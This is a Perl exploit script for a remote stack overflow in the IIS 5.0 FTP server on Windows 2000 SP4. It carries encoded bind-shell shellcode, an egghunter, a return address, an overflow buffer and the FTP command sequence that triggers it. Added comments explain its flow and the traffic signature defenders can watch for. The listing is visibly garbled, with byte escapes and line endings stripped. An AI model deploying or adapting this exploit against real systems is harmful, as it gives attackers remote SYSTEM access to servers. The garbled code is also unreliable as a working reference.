
# Title : Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)
# Published : 2009-09-01
# Author : muts


#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket; 
# NOTE(review): this listing is an extraction of the original script: the
# backslashes of the "\x.." byte escapes, of "\r\n" line endings and of the
# "\." in the s/// below appear to have been stripped, so the text as shown
# does not run as intended.  Comments below describe the script as written.
#
# Overall flow (flat script, no subs): after the argument check, the process
# forks.  The parent connects to the target's FTP control port (21) and
# sends a fixed sequence of commands carrying three payload buffers; the
# child binds a random local port and prints whatever connects to it (the
# PORT command sent later points the server's data connection at that port).
#
# Defender's view: the observable server-side signature is an anonymous FTP
# login followed by MKD/CWD/SITE commands with long, mostly non-printable
# arguments and an NLST whose argument contains "*/../" — none of which a
# legitimate client emits.  Logging or blocking such command arguments at
# the FTP server or an inspecting proxy detects this traffic.

$|=1;                                   # unbuffered STDOUT so server banners appear immediately

# First-stage payload.  The header comment says an egghunter was added for a
# larger secondary payload, so this is presumably the hunter stage — confirm;
# the msfpayload/msfencode comment under it records how a payload was built.
$sc = "x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" .
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" .
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" .
"x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f" .
"x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46" .
"x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34" .
"x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a" .
"x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"

# Secondary (larger) payload, prefixed with the doubled egg tag "T00W" that an
# egghunter searches memory for.  It is transmitted as the PASS argument of
# two throw-away logins below, presumably so that it lands in server memory
# where the hunter can locate it — not verifiable from this file alone.
$shell="T00WT00W" ."xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4" .
"x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86" .
"xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01" .
"x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c" .
"x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb" .
"x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85" .
"xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e" .
"xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a" .
"x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5" .
"x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee" .
"x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3" .
"x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85" .
"x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8" .
"xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a" .
"x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80" .
"xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84" .
"x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d" .
"x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60" .
"x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca" .
"xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3" .
"x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19" .
"xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed" .
"xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f" .
"x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4" .
"x95x1fx6dxa1x99x8cx8exe0x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2n"; 
# Argument check: expects exactly two arguments (target, local IP).  `ne` is a
# string comparison; the numeric idiom for this test is `$#ARGV != 1`.
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>n"; 
exit(0); 
} 
srand(time()); 
# Random local port in 1025..31339 for the data connection the child listens on.
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
# Intended to turn the dotted local IP into the comma-separated form the FTP
# PORT command needs; as printed here (unescaped ".") it would replace every
# character, another sign of the stripped backslashes noted above.
$locip =~ s/./,/gi; 
# fork() returns the child's pid (true) in the parent, 0 in the child:
# parent = FTP control-channel sender, child = local listener.
if (fork()) { 
# No check that the connect succeeded; a failed connect leaves $sock undef and
# the reads/prints below would warn rather than abort.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "x7ExF1xFAx7F";
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms 

# $v: "KSEXY" marker + first-stage payload, padded with "V" to exactly 500
# bytes; sent repeatedly via SITE below.
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
# The bytes x53x45x58x59 ("SEXY") inside this stub match the marker that
# prefixes $v, so it appears to scan for that marker — consistent with the
# author's comment, but not verified here.
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53" 
   ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0"; 

# attack buffer 
# Composed of the locator stub, repeated $patch dwords, the JMP ESP return
# address and filler; it is used both as an MKD argument and as the NLST
# argument that the author marks as the trigger.
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN"; 
# Read the banner, then echo every server reply to STDOUT as the session
# proceeds (same read/print pair after each command).
$x = <$sock>; 
print $x;                             
# Two logins with the large tagged payload as the password (expected to be
# rejected; the payload text is the point, see $shell above).
print $sock "USER anonimoosrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shellrn";
$x = <$sock>; 
print $x; 
print $sock "USER anonimoosrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shellrn";
$x = <$sock>; 
print $x; 

# Real anonymous login; everything after this requires anonymous FTP access
# on the target, so disabling anonymous login removes this exposure.
print $sock "USER anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymousrn"; 
$x = <$sock>; 
print $x; 
# Creates and later enters a directory named after the random port; this
# also requires write access for the anonymous account.
print $sock "MKD w00t$portrn"; 
$x = <$sock>; 
print $x; 
# $v is sent five times as a SITE argument to place multiple copies of the
# first stage in server memory.
print $sock "SITE $vrn"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>;
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$portrn"; 
$x = <$sock>; 
print $x; 
# Directory name = "CCC" + the attack buffer; an MKD with a long binary
# argument is a clear anomaly in server logs.
print $sock "MKD CCC". "$crn"; 
$x = <$sock>; 
print $x; 
# PORT h1,h2,h3,h4,p1,p2 — directs the server's data connection to this
# host's $port (high byte, low byte), where the child process is listening.
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
# NLST with the attack buffer, a wildcard and a "../" component; this is the
# request the author identifies as the one that overflows the server.
print $sock "NLST $c*/../C*/rn"; 
$x = <$sock>; 
print $x; 
# Busy-wait forever; presumably keeps the control connection open so the
# server-side process is not torn down — burns a full CPU core meanwhile.
while (1) {} 
} else { 
# Child: listen on all interfaces at the random port, accept one connection
# and print every line received, then close the listener and fall off the
# end of the script.
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope
